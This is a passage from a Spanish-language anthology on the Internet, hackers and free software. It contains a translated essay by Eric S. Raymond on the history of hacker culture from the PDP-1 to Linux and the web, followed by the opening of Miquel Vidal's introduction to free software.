más fácil y barato. Su facilidad de usotambién mejorará del salvaje interfaseUNIX del TCP/IP a otros muchos másintuitivos y cómodos para el usuario,eso es una buena noticia. AprenderInternet ahora, o al menos aprendersobre Internet, es para entendidos.Cuando cambiemos de siglo la culturade redes, tal como la cultura de losordenadores antes de ésta, seintroducirá forzosamente en el ámbito desu vida.

Page 67: Internet, hackers y software li   varios

Breve historia de la«cultura hacker»

Eric S. Raymond nació en Boston,Estados Unidos, en 1957. Hacker yentusiasta de la ciencia ficción,participó desde los inicios, a principiosde los '80, del proyecto GNU quebuscaba crear un sistema operativoestilo UNIX pero gratuito. En losúltimos años se convirtió en divulgadorde la práctica de código abierto, a travésde textos como La Catedral y el Bazar(1997) y Cómo convertirse en hacker(2001). Sus opiniones conciliadoras conlos intereses de las empresasinformáticas lo llevaron a debatir con

Page 68: Internet, hackers y software li   varios

Richard Stallman.El siguiente es un ensayo de

divulgación sobre la historia de lacultura hacker. La primera versión datade 1992, pero fue modificada sucesivasveces hasta 2000.

Prologo: Los ProgramadoresAutenticos

En el principio habia ProgramadoresAutenticos.

No se hacían llamar así. Tampocohackers, ni de otra manera en particular:

Page 69: Internet, hackers y software li   varios

el apodo de Programadores Auténticosno se acuñó hasta 1980. Pero de 1945 enadelante la tecnología de la computaciónatrajo a muchas de las mentes másbrillantes y creativas del mundo. Desdela ENIAC[4] de Eckert y Mauchly existióuna cultura técnica de programadoresentusiastas ininterrumpida y conscientede sí misma, gente que creaba y jugabacon el software para divertirse.

L o s Programadores Auténticosvenían en general de la física y laingeniería. Vestían medias blancas ychombas de poliéster, y corbatas yanteojos gruesos, y escribían programasen lenguaje de máquina y assembler y

Page 70: Internet, hackers y software li   varios

FORTRAN y en media docena delenguajes hoy olvidados. Estos fueronlos precursores de la cultura hacker, losprotagonistas de su prehistoria a los quelas tradiciones ya no recuerdan.

Desde el fin de la Segunda GuerraMundial hasta comienzos de los ‘70, enlos grandes días de la computaciónbatch[5] y de las grandes centrales dehierro, los Programadores Auténticosfueron la cultura técnica dominante de lacomputación. Algunos fragmentos defolklore hacker de culto provienen deesta época, incluyendo la conocidahistoria de Mel (incluida en la JargonFile[6]), muchas Leyes de Murphy y el

Page 71: Internet, hackers y software li   varios

póster de Blinkenlights de parodianazi[7] que aún hoy decora muchossalones de computadoras.

Algunos de los que se iniciaron en lacultura de los ProgramadoresAuténticos siguieron activos en los ‘90.Se dice que Seymour Cray, el diseñadorde la línea de súper computadoras Cray,una vez puso en marcha un sistemaoperativo escrito por él mismo en unacomputadora armada por él mismo. Enoctal. Sin errores. Y funcionó.Programador Auténtico de Elite.

A otro nivel, Stan Kelly-Bootle,autor de The Devil´s DP Dictionary(New York, McGraw-Hill, 1981) y gran

Page 72: Internet, hackers y software li   varios

folklorista, programó en la ManchesterMark I, la primera computadora digitaltotalmente operativa y con un programaalmacenado en la memoria, en 1948.Hoy escribe columnas humorísticassobre tecnología para revistas decomputación que suelen adoptar laforma de conversaciones intensas ysabias con la cultura hacker.

Otros, como David E. Lundstrom,han escrito la historia de esos primerosaños y sus anécdotas (A Few Good MenFrom UNIVAC. Cambridge, MIT Press,1987).

Lo que introdujo la cultura de losProgramadores Auténticos fue el

Page 73: Internet, hackers y software li   varios

despertar de la computación interactiva,las universidades y las redes. Estasdieron nacimiento a una ininterrumpidatradición de ingeniería y programas que,eventualmente, daría lugar a la actualcultura hacker de código abierto.

Los inicios de la cultura hackercomo la conocemos hoy pueden fijarseen 1961, el año en que el MIT [Institutode Tecnología de Massachusetts]adquirió la primera PDP-1.[8]

El Club de Tecnología de renes aEscala del MIT adoptó la máquina comosu juguete favorito e inventóherramientas de programación, argot ytoda una cultura a su alrededor que

Page 74: Internet, hackers y software li   varios

todavía sigue entre nosotros. Estosprimeros años se narran en la primeraparte del libro Hackers de Steven Levy(New York,Bantam Books, 1984).

La cultura informática del MITparece ser la primera en adoptar eltérmino hacker. Los hackers del Club deModelos de Trenes se convirtieron en elnúcleo del Laboratorio de InteligenciaArtificial (IA) del MIT, el centro lídermundial en investigaciones sobre IA aprincipios de los ‘80. Su influencia seextendió sobre todo a partir de 1969, elprimer año de la red ARPA.

La red ARPA fue la primera red decomputadoras transcontinental de alta

Page 75: Internet, hackers y software li   varios

velocidad. Fue creada por elDepartamento de Defensa como unexperimento sobre comunicacionesdigitales, pero fue creciendo hastaconectar a cientos de universidades,laboratorios de investigación eindustrias armamentísticas. Permitió alos investigadores de todas partesintercambiar información a unavelocidad y flexibilidad sin precedentes,dándole un impulso enorme a lostrabajos en colaboración eincrementando tremendamente el ritmo yla intensidad del avance tecnológico.

Pero la red ARPA también hizo otracosa. Sus autopistas electrónicas

Page 76: Internet, hackers y software li   varios

pusieron en contacto a hackers de todoEE.UU creando una masa crítica; enlugar de permanecer aislados enpequeños grupos, cada unodesarrollando sus propias culturaslocales y efímeras, se descubrieron (o sereinventaron) como tribu unida en red.

Los primeros artefactos deliberadosde la cultura hacker las primerasantologías de argot, las primeras sátiras,las primeras discusiones conscientessobre ética hacker se propagaron por lared ARPA en los primeros años (laprimera versión de la Jargon File, porejemplo, data de 1973). La culturahacker fue creciendo en las

Page 77: Internet, hackers y software li   varios

universidades conectadas a la Red, enespecial (aunque no exclusivamente) ensus departamentos de ciencia.

En cuanto a técnica, el laboratoriode Inteligencia Artificial del MIT estabapor encima de los demás a fines de los‘60. Pero el Laboratorio de InteligenciaArtificial de la Universidad de Stanford(SAIL) y (luego) la Universidad deCarnegie-Mellon (CMU) devinieroncasi igual de importantes. Todos erancentros florecientes de cienciainformática e investigación de IA. Todosatrajeron a brillantes personas que leaportaron a la cultura hacker grandescosas, en ambos niveles, técnico y

Page 78: Internet, hackers y software li   varios

folklórico.Pero para comprender lo que vino

después tenemos que echarles otramirada a las propias computadoras,porque el auge de los laboratorios y sueventual caída se debieron ambos a olasde cambios en la tecnología de lasmáquinas.

Desde los días de la PDP-1 la suertede la cultura hacker se vio unida a laserie de minicomputadoras PDP de DEC(Corporación de Equipos Digitales).DEC era pionera en computacióncomercial interactiva y sistemasoperativos de recursos compartidos.Debido a que sus máquinas eran

Page 79: Internet, hackers y software li   varios

flexibles, poderosas y relativamentebaratas para la época, muchasuniversidades las compraban.

Los recursos compartidos fueron elmedio en el que floreció la culturahacker y, durante la mayor parte de suexistencia, la red ARPA fue básicamenteuna red de máquinas DEC. La másimportante de éstas fue la PDP-10, de1967. Las 10 fueron las máquinasfavoritas de la cultura hacker por casiquince años; TOPS-10 (el sistemaoperativo de DEC) y MACRO-10 (sulenguaje de programación) se recuerdantodavía con nostalgia; los dosprodujeron abundante argot y folklore.

Page 80: Internet, hackers y software li   varios

El MIT, pese a usar las mismasPDP-10 que los demás, tomó un caminoligeramente distinto; descartaron todo elsoftware de DEC para la PDP-10 y sededicaron a diseñar su sistemaoperativo propio, el mítico ITS.

ITS quería decir: Sistema deRecursos Compartidos NoCompatible,[9] lo que da una ideaaproximada de su actitud. Lo queríanhacer a su manera. Por suerte paratodos, la gente del MIT era inteligenteademás de arrogante. ITS, a pesar de serexcéntrico y complicado, y de estar, aveces, cargado de errores, aportaba unaserie de innovaciones técnicas brillantes

Page 81: Internet, hackers y software li   varios

y seguramente mantiene todavía elrécord para el sistema de recursoscompartidos vigente por mayor tiempo.

ITS estaba escrito en assembler,s[10]

pero muchos proyectos de ITS seescribían en un lenguaje con elementosde Inteligencia Artificial llamado LISP.LISP era más poderoso y flexible quelos demás lenguajes de la época; dehecho, posee un diseño superior a lamayoría de los lenguajes de laactualidad, después de veinticinco años.LISP les dio libertad a los hackers deITS para pensar de maneras creativas einusuales. Fue un factor importante ensus éxitos, y sigue siendo un lenguaje

Page 82: Internet, hackers y software li   varios

favorito de la cultura hacker.Muchas creaciones técnicas de la

cultura de ITS hoy siguen vivas; eleditor de programas Emacs[11]quizás seala más conocida. Y mucho del folklorede ITS sigue vivo para los hackers,como se puede ver en la Jargon File.

SAIL (Stanford) y CMU (Carnegie-Mellon) no se quedaron quietas,tampoco. Muchos cuadros hackers quese formaron en torno a las PDP-10 deSAIL se convirtieron después en figurasclave del desarrollo de lascomputadoras personales y lasinterfaces actuales tipoventana/ícono/mouse. Y los hackers de

Page 83: Internet, hackers y software li   varios

CMU hacían experimentos queconducirían a las primeras aplicacionesprácticas a gran escala de sistemasexpertos y robótica industrial.

Otra zona importante de la culturaera Xerox PARC, el famoso Centro deInvestigaciones de Palo Alto. Por másde una década, desde principios de los‘70 hasta mediados de los ‘80, PARCentregó un volumen sorprendente deinnovaciones revolucionarias dehardware y software. El estilo modernode las interfaces con mouse, ventanas eíconos se inventó allí. También lasimpresoras láser y las redes locales; laserie de computadoras D de PARC se

Page 84: Internet, hackers y software li   varios

anticipó una década a las poderosascomputadoras personales de los ‘80.Lamentablemente, estos profetas no eranescuchados en su propia compañía; tantoes así que se volvió un chiste repetidodescribir a PARC como un lugardedicado a desarrollar ideas brillantespara que las usaran otros. Su influenciaen la cultura hacker fue amplia.

Las culturas de la red ARPA y PDP-10 aumentaron su vigor y variedad a lolargo de los ‘70. Los sistemas de listasde correo electrónico que se habíanusado para nutrir la cooperación entregrupos de interés dispersos por loscontinentes, se usaban cada vez más con

Page 85: Internet, hackers y software li   varios

propósitos sociales y recreativos. EnARPA se hizo la vista gorda a todaactividad técnica no autorizada —lasobrecarga de datos era un preciomenora cambio de atraer al campo de lainformática a una generación de jóvenesbrillantes.

De las listas de mails sociales de lared ARPA, la más popular debía ser laSF-LOVERS (Amantes de la CienciaFicción); de hecho, sigue funcionandohoy dentro de la red más extensallamada Internet, la cual absorbió a lared ARPA. Pero había muchas otras, queinauguraban un estilo de comunicaciónque más tarde sería explotado

Page 86: Internet, hackers y software li   varios

comercialmente por servicios derecursos compartidos comoCompuserve, GEnie y Prodigy.

El surgimiento de UNIX

Mientras tanto, sin embargo, en unsalvaje lugar de Nueva Jersey otra cosahabía estado sucediendo desde 1969 queeventualmente opacaría la tradición dela PDP-10. El año del nacimiento de lared ARPA fue también el año en que unhacker de los laboratorios Labs llamadoKen Thompson inventó el sistema

Page 87: Internet, hackers y software li   varios

operativo UNIX.Thompson había estado involucrado

en el desarrollo de un sistema operativode recursos compartidos llamadoMultics, que tenía orígenes comunes conITS. Multics fue un espécimen de pruebapara algunas ideas sobre cómo lacomplejidad de un sistema operativo sepodría ocultar en su interior,imperceptible para el usuario e inclusopara la mayoría de los programadores.La idea era lograr que usar Multicsdesde afuera (¡y programar para él!) setornara más sencillo, para que pudierarealizarse más trabajo concreto.

Bell Labs abandonó el proyecto

Page 88: Internet, hackers y software li   varios

cuando Multics mostró señales de estarmutando en un inservible elefante blanco(el sistema fue puesto ala venta luegopor la empresa Honeywell pero nuncatuvo éxito). Ken Thompson se quedó sinel entorno Multics, y empezó a hacerpruebas con una mezcla de sus ideas yotras propias en una DEC PDP-7rescatada de la basura.

Otro hacker llamado Denis Ritchieinventó una nuevo lenguaje llamado Cpara usar bajo el UNIX embrionario deThompson. Al igual que UNIX, C fuediseñado para ser amable, ligero yflexible. En Bell Labs se despertó elinterés por estas herramientas, y

Page 89: Internet, hackers y software li   varios

recibieron un impulso en 1971 cuandoThompson y Ritchie ganaron unaconvocatoria para producir lo que hoyllamaríamos un sistema deautomatización de oficina para usointerno. Pero Thompson y Ritchie teníanen mente algo más grande.

Tradicionalmente, los sistemasoperativos se escribían en lenguajeassembler ajustado para extraer laeficiencia más alta de las computa dorasque los albergaban. Thompson y Ritchiefueron de los primeros en darse cuentade que la tecnología de hardware y decompiladores se había vuelto losuficientemente buena para poder

Page 90: Internet, hackers y software li   varios

escribir un sistema operativoenteramente en C, y para 1974 el sistemacompleto había sido transportado conéxito a diversas computadoras dediferentes tipos.

Esto no se había hecho nunca, y lasimplicancias fueron enormes. Si Unixpodía mostrar el mismo aspecto, lasmismas características, en computadorasdiferentes, podía servir como entorno desoftware común para todas ellas. Losusuarios no tendrían que pagar nuncamás por el diseño del software cada vezque cambiaban de computadora. Loshackers podrían llevar consigo susherramientas entre diferentes máquinas,

Page 91: Internet, hackers y software li   varios

en lugar de tener que reinventar el fuegoy la rueda en cada ocasión.

Además de la portabilidad, Unix y Ctenían otros aspectos ventajosos. Ambosestaban diseñados según una filosofía de¡Hazlo simple, estúpido!. Unprogramador podía manejar en la cabezatoda la estructura lógica del C (adiferencia de la mayoría de loslenguajes anteriores) en vez de tener queconsultar los manuales todo el tiempo; yUNIX se estructuraba como un kit deprogramas simples diseñados paracombinarse entre sí de manerasproductivas.

Esta combinación mostró ser

Page 92: Internet, hackers y software li   varios

adaptable a una gama muy amplia detareas informáticas, incluyendo muchastotalmente imprevistas por susdiseñadores. Se difundió con granrapidez dentro de ATT, pese a no contarcon ningún apoyo formal de la empresa.Para 1980 se había difundido por ungran número de universidades y sitios deinvestigación informática, y miles dehackers lo consideraban su hogar.

Las locomotoras de la cultura UNIXinicial fueron las PDP-11 y susescendientes, las VAX. Pero debido a laportabilidad de UNIX, éste corría sinmodificaciones esenciales en unadiversidad de computadoras mayor de

Page 93: Internet, hackers y software li   varios

las que se podía encontrar en toda la redARPA. Y nadie usaba assembler; losprogramas en C se traspasaban alinstante entre esas computadoras.

Unix tenía incluso su propia red, detipo UUCP (Protocolo de TransferenciaUnix a Unix): lenta e inestable, perobarata. Dos máquinas Unix podíanintercambiar correo electrónico punto-a-punto por la línea de teléfono común;esta opción era parte del sistema, no unagregado especial. Los sitios Unixcomenzaron a formar en sí una nación enred, y una cultura hacker la acompañó.En 1980, aparece el primer nodo Usenetque pronto se extendería hasta superar a

Page 94: Internet, hackers y software li   varios

ARPA.En la red ARPA había pocos sitios

Unix. Las culturas de las PDP-10 deARPA y la de Unix comenzaron aencontrarse y confluir en los bordes,pero no combinaron bien al principio.Los hackers de la PDP-10 tendían aconsiderar a los de Unix como unabanda de aficionados, que usabaherramientas de aspecto tosco yprimitivo si se las comparaba con lasbarrocas y adorables complejidades deLISP e ITS. ¡Cavernícolas! les decían.

Y además había una terceracorriente avanzando. La primeracomputadora personal había salido al

Page 95: Internet, hackers y software li   varios

mercado en 1975. Apple se fundó en1977, y en los años siguientes seprodujeron avances a una velocidad casiincreíble. La potencialidad de lasmicrocomputadoras[12] era eviden te, yatrajo a una nueva generación dejóvenes y brillantes hackers. Su lenguajeera el BASIC, tan primitivo que tantolos partisanos de la PDP-10 como losaficionados de Unix lo despreciaban.

El Fin de los Viejos Tiempos

Así estaban las cosas en 1980: tres

Page 96: Internet, hackers y software li   varios

culturas, que se superponían en losbordes pero que estaban organizadas entorno a tecnologías muy diferentes: a) lacultura de la red ARPA/PDP-10, fiel aLISP y MACRO y TOPS-10 e ITS. b) Lagente de Unix y C con sus PDP-11´s ysus VAX y sus lentas conexionestelefónicas. Y c) una horda anárquica deaficionados a las computadoras chicas ybaratas dedicados a darle a la gente elpoder de la computación.

Entre éstas, la cultura de ITS todavíapodía reivindicarse como la original.Pero se cernían nubes de tormenta sobreel MIT. La tecnología de las PDP-10 dela que ITS dependía estaba

Page 97: Internet, hackers y software li   varios

envejeciendo, y el Laboratorio mismo sedividió en departamentos para losprimeros intentos de comercializartecnologías de Inteligencia Artificial.Algunos de los mejores investigadoresdel MIT (y del SAIL y la CMU)partieron tras empleos y altos sueldos enempresas de innovación tecnológica.

La estocada final se produjo en1983, cuando DEC canceló sus planes afuturo para la PDP-10 para concentrarseen la PDP-11 y la línea VAX. ITSperdió su hábitat. Ya que no eraportable, llevar el sistema ITS a lasnuevas computadoras requería unesfuerzo que nadie estaba dispuesto a

Page 98: Internet, hackers y software li   varios

hacer. La versión de Berkeley de Unixcorriendo en máquinas VAX seconvirtió en el sistema por excelenciade los hackers, y cualquiera con ciertavisión de futuro podía ver que lascomputadoras personales aumentaban supoder tan velozmente que barrerían contodo a su paso.

En esta época Levy escribióHackers. Uno de sus mejoresinformantes fue Richard Stallman(inventor de Emacs), una figura líder enel Laboratorio del MIT y el vocero másfanático contra la venta comercial de sutecnología.

Stallman (a quien se conoce

Page 99: Internet, hackers y software li   varios

usualmente por sus iniciales y nombrede login, RMS) creó la Free SoftwareFoundation [Fundación Software Libre]y se dedicó a escribir software libre dealta calidad. Levy lo describió como elúltimo hacker auténtico, unadescripción que por suerte se probóequivocada.

El gran estilo de trabajo de Stallmanes un ejemplo claro de los cambios queatravesaba la cultura hacker a principiosde los ‘80; en 1982 comenzó laconstrucción de un clon completo deUnix, escrito en C y disponiblegratuitamente. Así, el espíritu y latradición de ITS se preservó como parte

Page 100: Internet, hackers y software li   varios

importante de la renovada cultura hackerde Unix y las VAX.

Fue en esta época también que lastecnologías del microchip y las redeslocales comenzaron a tener un impactoserio en la cultura hacker. Ethernet y losmicrochips 68000 de Motorola fueronuna combinación muy potente, y variasempresas se habían creado para diseñarla primera generación de lo que ahorallamamos estaciones de trabajo.

En 1982, un grupo de hackers delUnix de Berkeley fundaron SunMicrosystems con la idea de que Unixcorriendo en computadoras con el chip68000 relativamente barato sería una

Page 101: Internet, hackers y software li   varios

dupla ganadora para una amplia gama deaplicaciones. Tenían razón, y su visiónestableció el standard para toda laindustria. Aunque todavía estuvieranfuera del alcance de las personascomunes, las estaciones de trabajo eranbaratas para las corporaciones y lasuniversidades; las redes conectadas aellas (una estación por usuario)remplazaron rápidamente a las viejasVAX y otros sistemas de recursoscompartidos.

La Era del Unix Propietario

Page 102: Internet, hackers y software li   varios

En 1984, cuando Unix se convirtióen un producto comercial por primeravez, la separación más importante en lacultura hacker lo constituían una naciónen red relativamente unida, que habíacrecido en torno a Internet y Usenet (ensu mayoría usando minicomputadoras oterminales que usaban Unix), y unarchipiélago en gran medidadesconectado de fanáticos de lascomputadoras personales desde suscasas.

Con las máquinas tipo estación detrabajo[13] de Sun y otras empresas seabrieron nuevos mundos para loshackers. Se habían diseñado para

Page 103: Internet, hackers y software li   varios

generar gráficos de alto rendimiento ycompartir datos en redes. En los ‘80 lacultura hacker se concentró en sacar elmayor provecho de stas característicaspor medio de software y el diseño deherramientas. La versión del Unix deBerkeley incorporó soporte paraemplear la red ARPA, lo cual solucionóel problema de la conexión a la red ydio impulso al crecimiento de Internet.

Hubo varios intentos de domesticarlos gráficos de las estaciones de trabajo.El que prevaleció fue el Sistema XWindow. Un factor crucial de su éxitofue que los creadores de X deseabanentregar gratuitamente las fuentes[14] del

Page 104: Internet, hackers y software li   varios

programa de acuerdo con la éticahacker, y estuvieron en condiciones dedistribuirlas en Internet. Este triunfo deX Window sobre los sistemas degráficos propietarios (incluido unoofrecido por la propia Sun) sentó unprecedente importante de cambios que,pocos años después, afectaríanprofundamente al mismo Unix.

Quedaba en el ambiente un poco demelancolía que se sacaba a relucir cadatanto en la rivalidad entre ITS y Unix(sobre todo del lado de los de ex-ITS).Pero la última máquina ITS dejó defuncionar para bien en 1990; a losfanáticos no les quedó otra que aceptar

Page 105: Internet, hackers y software li   varios

la derrota y asimilarse a la cultura Unix,aunque sea a regañadientes.

En la cultura hacker conectada enred, la gran rivalidad de los ‘80 laprotagonizaron los fans de las versionesBerkeley y ATT de Unix. A vecestodavía se encuentran copias de unpóster de esa época, que muestra unanave X-wing de Star Wars huyendo deuna Estrella de la Muerte con el logo deATT que vuela en pedazos. Los hackersde Berkeley se veían a si mismos comorebeldes contra los mezquinos imperioscorporativos. El Unix de ATT nuncaigualó al de Berkeley/Sun en ventas,pero ganó la guerra por los standards.

Page 106: Internet, hackers y software li   varios

Para 1990, se hacía difícil distinguir lasversiones de Berkeley y ATT, pueshabían adoptado muchas innovacionesuna de la otra.

Al empezar los ‘90 la tecnología deestaciones de trabajo de la déca daanterior empezaba a verse severamenteasediada por nuevas computadoraspersonales (PC´s), baratas y de altorendimiento basadas en el chip Intel 386y sus sucesores. Por primera vez, loshackers podían acceder en su casa a unacomputadora comparable en poder yalmacenamiento a las minicomputadorasde diez años atrás sistemas Unixcapaces de sostener un entorno de

Page 107: Internet, hackers y software li   varios

desarrollo completo y comunicarse conInternet.

El mundo del MS-DOS ni se enteróde esto. Aunque aquellos primerosentusiastas de las computadoraspersonales se expandieron rápidamentea una población de hackers de DOS yMac en una magnitud mayor que los dela cultura de la nación en red, nunca seconvirtieron en una cultura consciente desí misma. El ritmo de los adelantos eratan veloz que surgieron cincuentaculturas tecnológicas distintas y seextinguieron como moscas, sin alcanzarla estabilidad necesaria para desarrollaruna tradición, argot, folklore e historia

Page 108: Internet, hackers y software li   varios

mítica comunes. La ausencia de una redeficaz comparable a la UUCP o laInternet impidió que se convirtieran enuna nación en red por sí mismas. Elcreciente acceso telefónico a servicioscomerciales tipo CompuServe y Genieempezaba a imponerse, pero el hecho deque los sistemas operativos distintos aUnix no vinieran con herramientas dedesarrollo incorporadas hizo quecirculara muy poco código fuente. Así,no se generó ninguna tradicióncooperativa de hacking.

La cultura hacker, (des)organizadaen torno a Internet y a esta alturaidentificada con la cultura tecnológica

Page 109: Internet, hackers y software li   varios

de Unix, era indiferente a los servicioscomerciales. Ellos querían mejoresherramientas y más Internet, y las PC de32 bits baratas prometían poner ambascosas al alcance de todos.

¿Pero qué pasaba con el software?Los sistemas Unix seguían siendo caros,varios miles de dólares. A principios delos ‘90 varias compañías vendíanversiones para PC del UNIX de ATT oBerkeley (BSD). Su éxito fue escaso, losprecios no bajaron y (sobre todo) juntoal sistema operativo no se adquirían lasfuentes modificables. El modelo denegocios tradicional del software no lesdaba a los hackers lo que querían.

Page 110: Internet, hackers y software li   varios

Tampoco lo hacía la Fundación deSoftware Libre. El desarrollo de HURD,el código de Unix abierto y libre paralos hackers que Richard Stallman veníaprometiendo desde hace tiempo, quedótrabado durante años y no logró producirnada parecido a un sistema sólido hasta1996 (aunque para 1990 la FSF yabrindaba casi todas las demás partescomplejas de un sistema operativo estiloUnix).

Para peor, se hacía claro acomienzos de los ‘90 que los diez añosde esfuerzos por hacer redituable laventa de Unix terminaban en fracaso. Laprometida portabilidad entre

Page 111: Internet, hackers y software li   varios

plataformas de Unix se extravió enmedio de batallas legales entre la másde media docena de versionespropietarias de Unix. Los que vendíanUnix fueron tan torpes, ciegos e ineptospara el marketing que Microsoft pudorobarles gran parte del mercado con sutecnología Windows ridículamenteinferior.

A principios de 1993, un observadorhostil contaba con motivos para decirque la historia de Unix se extinguía, ycon ella la suerte de la tribu hacker. Noescaseaban testigos así en la prensainformática; la inminente muerte de Unixse predecía cíclicamente cada seis

Page 112: Internet, hackers y software li   varios

meses desde fines de los ’70.En aquellos días todos creían que la

era del tecno-heroísmo se habíaacabado, que la industria del software yla naciente Internet serían dominadaspor colosos como Microsoft. La primerageneración de hackers de Unix parecíaagotada y envejecida (el grupo deInvestigación de Ciencia Informática deBerkeley se quedó sin nafta y perdió elapoyo financiero en el ‘94). Fueron díasdeprimentes.

Pero por suerte habían estadopasando cosas fuera de la vista de laprensa comercial, y fuera incluso de lavista de la mayoría de los hackers, que

Page 113: Internet, hackers y software li   varios

terminarían generando cambios muymotivadores a fines de 1993 y 1994.Eventualmente, éstos llevarían a lacultura en una dirección completamentenueva y hacia un éxito jamás soñado.

Los Primeros Unix Libres

En el bache que dejó el intentofallido de Stallman de crear un Unixlibre,[15] apareció un estudiante de laUniversidad de Helsinki llamado LinusTorvalds. En 1991 comenzó adesarrollar un kernel[16] libre de Unix

Page 114: Internet, hackers y software li   varios

para máquinas 386 usando lasherramientas de la Fundación SoftwareLibre. Su veloz éxito inicial atrajo amuchos hackers de Internet quecooperaron con él para desarrollarLinux, un Unix totalmente equipado confuentes gratuitas y de distribución libre.

A Linux no le faltaban competidores.En 1991, al mismo tiempo que losprimeros experimentos de LinusTorvalds, William y Lyne Jolitz estabantransportando a modo de prueba el Unixde Berkeley (BSD) a la PC 386. Lamayoría de los expertos que compararonla tecnología de la versión BSD con losprimeros intentos de Linus dijeron que

Page 115: Internet, hackers y software li   varios

esa adaptación de BSD se convertiría enel Unix libre más importante para la PC.

Pero el aspecto más importante deLinux no era técnico, sino sociológico.Hasta el desarrollo de Linux, todoscreían que cualquier software tancomplejo como un sistema operativodebía desarrollarse con cuidado, demanera coordinada, por un grupo muyunido y no muy grande de personas. Estemodelo es y era típico tanto del softwarecomercial como de las grandescatedrales de software libre de laFundación Software Libre de los ‘80;también de los proyectosFREEBSD/NETBSD/OPENBSD que

Page 116: Internet, hackers y software li   varios

derivaron de las implementaciones deUNIX BSD 386 de Jolitz.

Linux evolucionó de un modoradicalmente distinto. Casi desde elprincipio, se abalanzaron conentusiasmo sobre él un enorme númerode hackers coordinados sólo a través deInternet. La calidad se conseguía no pormedio de standards rígidos o deverticalismo, sino por la estrategia tansencilla de hacer públicas las nuevasversiones todas las semanas y a lospocos días recoger las respuestas decientos de usuarios, creando una suertede selección darwiniana aceleradasobre las mutaciones introducidas por

Page 117: Internet, hackers y software li   varios

programadores. Para sorpresa de lamayoría,esto funcionó bien.

Para fines de 1993, Linux podíacompetir en estabilidad y confiabilidadcon muchos Unix comerciales, y contabacon mayor cantidad de software. Inclusoempezaba a interesar a empresascomerciales. Un efecto indirecto de esteproceso fue la desaparición de lamayoría de los pequeños distribuidoresde Unix comerciales que sinprogramadores y hackers a los quevenderles, quebraron. Uno de los pocossobrevivientes, BSDI (Berkeley SystemsDesign, Incorporated) se plegó a lanueva tendencia, ofreciendo las fuentes

Page 118: Internet, hackers y software li   varios

completas de su Unix-BSD y cultivandorelaciones amistosas con la comunidadhacker.

Estos cambios pasarondesapercibidos en su momento, inclusodentro de la cultura hacker. La culturahacker, desafiando todos los pronósticosde su desaparición, estaba empezando arediseñar el mundo del softwarecomercial a su semejanza. Pasaríancinco años más, de cualquier modo,antes de que esta tendencia se hicieraevidente.

La Gran Explosión de la Web

Page 119: Internet, hackers y software li   varios

El crecimiento inicial de Linux sepotenció con otro fenómeno: eldescubrimiento masivo de la Internet. Elinicio de los ‘90 también vio el iniciode una floreciente industria deproveedores de Internet, que vendían elacceso por unos pocos dólares al mes.Con la invención de la World WideWeb,[17] el ya rápido crecimiento deInternet se hizo vertiginoso.

Para 1994, el año en que el grupo dedesarrollo del Unix de Berkeley anuncióformalmente que se retiraba, variasversiones libres diferentes de Unix(Linux y las descendientes de BSD 386)fueron los focos de atención de la

Page 120: Internet, hackers y software li   varios

actividad hacker. Linux se estabadistribuyendo comercialmente en CD-ROM y vendiéndose como pan caliente.Para fines de 1995, las grandescompañías de informática comenzaban apublicar anuncios cargados de argotcelebrando lo fácil que era entrar aInternet con sus computadoras ysoftware.

A fines de los ‘90 las actividadesprincipales de la cultura hacker fueronel desarrollo de Linux y lapopularización de Internet. La WorldWide Web transformó la Internet en unmedio masivo, y muchos de los hackersde los ‘80 y principios de los ‘90

Page 121: Internet, hackers y software li   varios

lanzaron Servicios de Proveedores deInternet vendiendo o facilitando elacceso a las masas.

La popularización de Internet trajoademás para la cultura hacker el iniciode su respetabilidad pública y de laintervención política. En 1994 y 1995 elactivismo de los hackers abortó elprograma Clipper, que hubiera puesto laencriptación avanzada de datos bajocontrol del gobierno. En 1996 loshackers movilizaron una ampliacoalición para combatir la mal llamadaActa de Decencia de lasComunicaciones y prevenir la censuraen Internet.

Page 122: Internet, hackers y software li   varios

Con esta victoria pasamos de lahistoria a la realidad actual. Tambiénpasamos a un período en el que vuestrohistoriador se convierte en actor, nosólo observador. Esta narracióncontinuará en The Revenge of theHackers La Venganza de losHackers.[18]

Todos los gobiernos son enmayor o menor medida alianzas contrael pueblo… y en tanto los gobernantesno poseen más virtudes que losgobernados … el poder de un gobiernosólo puede mantenerse dentro de loslímites constitucionales a través de laexhibición de un poder equiparable a

Page 123: Internet, hackers y software li   varios

él, el sentimiento colectivo delpueblo.

Benjamin Franklin, en un editorialde Philadelphia Aurora, 1794.

Page 124: Internet, hackers y software li   varios

SOFTWARE LIBRE

Page 125: Internet, hackers y software li   varios

Cooperacion sinmando: una

introducción alsoftware libre

Miquel Vidal participa desde haceaños en distintas iniciativas de usosocial de Internet y el software libre.Formó parte de la primera áreatelemática en un centro social okupadoen España. Fue uno de los fundadoresdel proyecto sinDominio (http://sindominio.net ) en 1999, un

proyecto antagonista que buscatransformar las condiciones

Page 126: Internet, hackers y software li   varios

sociales del mundo en que vivimosdesde la horizontalidad, lacooperación y la libre circulación delsaber. También colaboró con elmantenimiento técnico del nodomadrileño de Indymedia (http://madrid.indymedia.org ).

Profesionalmente se desempeña comoadministrador de barrapunto.com, sitiode referencia de la comunidad hispanade software libre.

Fue publicado en agosto de 2000 enla biblioweb de sinDominio; ha sidocitado y reproducido en numerosasocasiones.

Si bien el software libre no es unfenómeno nuevo ya que existe desde losorígenes de la informática, sí es

Page 127: Internet, hackers y software li   varios

relativamente reciente su modelocooperativo de producción en red elllamado modelo bazar y el movimientosocial que lo avala la comunidad delsoftware libre. No ha sido hasta losúltimos cinco años en que, ligado a laextensión de Internet y a lapopularización de los ordenadorespersonales, el movimiento del softwarelibre ha alcanzado su masa crítica, hadejado de ser sólo cosa de algunosprogramadores y se ha convertido en unfenómeno de cooperación socialliberada. En la época de la subsunciónreal de la totalidad de las fuerzasproductivas bajo el capital, en la cual

Page 128: Internet, hackers y software li   varios

todo acaba valorizado en términosmercantiles, las empresas han tardado enadvertirlo pero finalmente se hanlanzado a la caza y captura de estaincreíble máquina productiva, tal vez lamayor empresa colectiva que existe hoydía. ¿Qué es pues el software libre, quetanto interés está empezando adespertar?

¿Que es el software?

El software es una produccióninmaterial del cerebro humano y tal vez

Page 129: Internet, hackers y software li   varios

una de las estructuras más complicadasque la humanidad conoce. De hecho, losexpertos en computación aún noentienden del todo cómo funciona, sucomportamiento, sus paradojas y suslímites.[19]

